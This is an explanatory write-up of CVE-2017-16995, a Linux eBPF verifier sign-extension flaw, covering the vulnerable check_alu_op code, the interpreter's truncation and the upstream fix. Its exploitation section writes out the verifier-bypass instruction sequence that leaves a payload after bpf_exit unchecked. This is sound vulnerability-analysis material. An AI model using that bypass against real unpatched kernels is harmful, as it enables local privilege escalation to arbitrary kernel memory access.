bpf check_alu_op vulnerability analysis (CVE-2017-16995)
Around December 2017, CVE-2017-16995 was published:
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
I came across this kernel exploit while rooting a machine on HackTheBox and used it to gain root privileges, which is what led me to try to understand it.
First, we'll want to understand: what is BPF exactly?
Berkeley Packet Filter (BPF) primarily lets you run filters against packets in kernel space. A filter is a set of instructions that runs inside the BPF virtual machine. Linux 3.18 introduced eBPF (extended BPF), which allows attaching such programs to sockets, tracepoints (for debugging purposes), and more. For example, tcpdump uses BPF bytecode to filter packets; you can view the BPF instructions by adding the -d argument:
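A representative dump for the filter 'ip and tcp' looks roughly like the following (the exact instructions and return values vary with the filter and the tcpdump version):

$ tcpdump -d 'ip and tcp'
(000) ldh      [12]
(001) jeq      #0x800           jt 2    jf 5
(002) ldb      [23]
(003) jeq      #0x6             jt 4    jf 5
(004) ret      #262144
(005) ret      #0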
The BPF Verifier
The bpf syscall essentially allows running code in kernel space from user space. That's a security risk, hence the BPF verifier. Its purpose is to make sure the instructions are safe to run. Here are some of the checks it performs:
- Verifies the program isn’t too big
- Forbids loops (DAG check)
- Forbids unreachable instructions from existing in the code
- Forbids reading from uninitialized registers
- Forbids exiting the filter without setting a return value first
- Verifies the program isn’t accessing invalid memory
The Vulnerability
The vulnerable function check_alu_op is responsible for checking the validity of arithmetic instructions. When the static code analyzer wants to MOV an immediate value into a register, the following code will execute in the verifier:
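(The excerpt below is paraphrased from the 4.14-era kernel/bpf/verifier.c, trimmed to the BPF_K branch of the MOV handling.)

/* check_alu_op(), simplified: BPF_MOV with an immediate (BPF_K) source */
if (BPF_SRC(insn->code) == BPF_K) {
        /* case: R = imm
         * remember the value we stored into this reg
         */
        regs[insn->dst_reg].type = SCALAR_VALUE;
        __mark_reg_known(regs + insn->dst_reg, insn->imm);
}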
Let's look at the bpf_insn struct and the signature of __mark_reg_known:
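(Reproduced, lightly trimmed, from include/uapi/linux/bpf.h and kernel/bpf/verifier.c of that era.)

/* include/uapi/linux/bpf.h */
struct bpf_insn {
        __u8    code;           /* opcode */
        __u8    dst_reg:4;      /* dest register */
        __u8    src_reg:4;      /* source register */
        __s16   off;            /* signed offset */
        __s32   imm;            /* signed immediate constant */
};

/* kernel/bpf/verifier.c */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm);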
By looking at the struct, we can see that the immediate value is a signed 32-bit integer, while the imm parameter of __mark_reg_known is an unsigned 64-bit integer. Therefore, an implicit type conversion occurs.
But what happens when we convert a signed integer into an unsigned one? According to this document, the conversion happens this way:
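Paraphrasing the C standard's rule for conversion to an unsigned type: if the signed value cannot be represented in the unsigned type, one more than the maximum value of the unsigned type is repeatedly added to it until the result is in range. For a negative value this boils down to:

unsigned_value = signed_value + (MAX_UNSIGNED_INT + 1)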
Let’s say we have this BPF instruction:
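The original snippet isn't reproduced here; a representative instruction, a 32-bit MOV of an immediate into r2 (mov32 r2, 0xFFFFFFFF), spelled out as a struct bpf_insn would be:

struct bpf_insn insn = {
        .code    = BPF_ALU | BPF_MOV | BPF_K,   /* 32-bit mov with an immediate source */
        .dst_reg = BPF_REG_2,
        .src_reg = 0,
        .off     = 0,
        .imm     = -1,                          /* 0xFFFFFFFF, stored in a signed 32-bit field */
};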
The immediate is a signed 32-bit int, so it's actually -1 in decimal. We perform the above calculation with a 64-bit MAX_UNSIGNED_INT of 0xFFFFFFFFFFFFFFFF:
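-1 + (0xFFFFFFFFFFFFFFFF + 1) = -1 + 2^64 = 0xFFFFFFFFFFFFFFFF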
This is essentially sign extension: the most significant bit was extended throughout the 64-bit "register". What should have happened is zero-padding of the upper 32 bits, since this is a MOV32 operation.
This results in 0xFFFFFFFFFFFFFFFF being saved to the hypothetical register state in the static code analyzer. But in reality, when the instructions actually run, the register gets zero-padded: 0x00000000FFFFFFFF. Now let's try to understand why the verifier's simulation differs from the actual code execution.
Let's take a look at the BPF core code, specifically __bpf_prog_run. What we're interested in is the BPF_ALU | BPF_MOV | BPF_K case. For reference: BPF_K means the source operand is an immediate value, and BPF_X means the source operand is a register. Let's look at the operation:
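(Excerpted, slightly trimmed, from the interpreter in the 4.14-era kernel/bpf/core.c; DST and IMM are local macros for the destination register and insn->imm.)

        ALU64_MOV_K:
                DST = IMM;
                CONT;
        ALU_MOV_K:
                /* 32-bit MOV: the immediate is truncated to 32 bits */
                DST = (u32) IMM;
                CONT;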
What differs here from the simulated MOV operation in the verifier is that the immediate value is cast to an unsigned 32-bit integer. This prevents the incorrect sign extension from occurring, and the result is 0xFFFFFFFF. Casting to unsigned before moving is also the fix that was deployed for this issue.
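(Paraphrased and simplified from the upstream fix to check_alu_op.)

regs[insn->dst_reg].type = SCALAR_VALUE;
if (BPF_CLASS(insn->code) == BPF_ALU64) {
        __mark_reg_known(regs + insn->dst_reg, insn->imm);
} else {
        /* 32-bit MOV: track the truncated value, not the sign-extended one */
        __mark_reg_known(regs + insn->dst_reg, (u32)insn->imm);
}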
Exploitation
We learned that the static code analyzer thinks we have a different immediate value in the register than what would actually be there during "real" code execution. The documentation in linux/kernel/bpf/verifier.c states:
bpf_check() is a static code analyzer that walks eBPF program instruction by instruction and updates register/stack state. All paths of conditional branches are analyzed until 'bpf_exit' insn.
The common way to exploit this vulnerability is to trick the analyzer into thinking the code always exits, using a conditional jump:
mov32 r2, 0xFFFFFFFF      // r2 gets sign-extended in the verifier
jne r2, 0xFFFFFFFF, +2    // if r2 != 0xFFFFFFFF, jump 2 instructions ahead
mov64 r0, 0x0             // set return code to 0
bpf_exit                  // stop execution - verifier stops here
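For reference, public PoCs typically build this sequence with the instruction macros from the kernel's include/linux/filter.h (or their tools/ copies); a sketch, with the attacker-controlled payload going after the exit:

struct bpf_insn prog[] = {
        BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),           /* mov32 r2, 0xFFFFFFFF   */
        BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* jne r2, 0xFFFFFFFF, +2 */
        BPF_MOV64_IMM(BPF_REG_0, 0),                    /* mov64 r0, 0x0          */
        BPF_EXIT_INSN(),                                /* bpf_exit               */
        /* ... unverified payload instructions go here ... */
};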
Let’s take a look at a part of the code that handles conditional jumps:
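(Paraphrased from check_cond_jmp_op() in the 4.14-era kernel/bpf/verifier.c, trimmed to the branch that handles comparisons against an immediate.)

if (BPF_SRC(insn->code) == BPF_K &&
    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
    dst_reg->type == SCALAR_VALUE &&
    tnum_equals_const(dst_reg->var_off, insn->imm)) {
        if (opcode == BPF_JEQ) {
                /* if (imm == imm) goto pc+off;
                 * only follow the goto, ignore fall-through
                 */
                *insn_idx += insn->off;
                return 0;
        } else {
                /* if (imm != imm) goto pc+off;
                 * only follow the fall-through branch, since
                 * that's where the program will go
                 */
                return 0;
        }
}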
tnum_equals_const is responsible for comparing the register state to the immediate value. We already know that insn->imm is a 32-bit signed integer, but inside the tnum struct, tnum.value is an unsigned 64-bit integer.
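(Roughly as defined in include/linux/tnum.h; a tnum tracks which bits of a register are known.)

struct tnum {
        u64 value;      /* known bit values */
        u64 mask;       /* bits whose value is unknown */
};

/* Returns true if @a is a known constant */
static inline bool tnum_is_const(struct tnum a)
{
        return !a.mask;
}

/* Returns true if @a == tnum_const(@b) */
static inline bool tnum_equals_const(struct tnum a, u64 b)
{
        return tnum_is_const(a) && a.value == b;
}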
So what happens when we compare a signed and an unsigned integer? Simply put, the compiler converts the signed integer to an unsigned one, repeating the same sign extension we looked at previously. Can you guess the output of this code?
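(The original snippet isn't reproduced here; the stand-alone program below mimics the comparison the verifier ends up doing.)

#include <stdio.h>
#include <stdint.h>

int main(void)
{
        int32_t  imm   = -1;                  /* the 0xFFFFFFFF immediate, as a signed 32-bit int */
        uint64_t value = 0xFFFFFFFFFFFFFFFF;  /* the verifier's (sign-extended) register value    */

        /* imm is converted to uint64_t, i.e. sign-extended, before the comparison */
        printf("%s\n", value == imm ? "true" : "false");
        return 0;
}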
The output would be true. After understanding this, it's clear that the aforementioned code would continue in the fall-through branch, going to the bpf_exit call, and leaving any code coming after the exit call unverified.
Leveraging this issue, an attacker can place malicious code after the exit call and gain arbitrary read/write access to kernel memory.
Extra information: eBPF Instructions Doc, PoC of Privilege Escalation, another PoC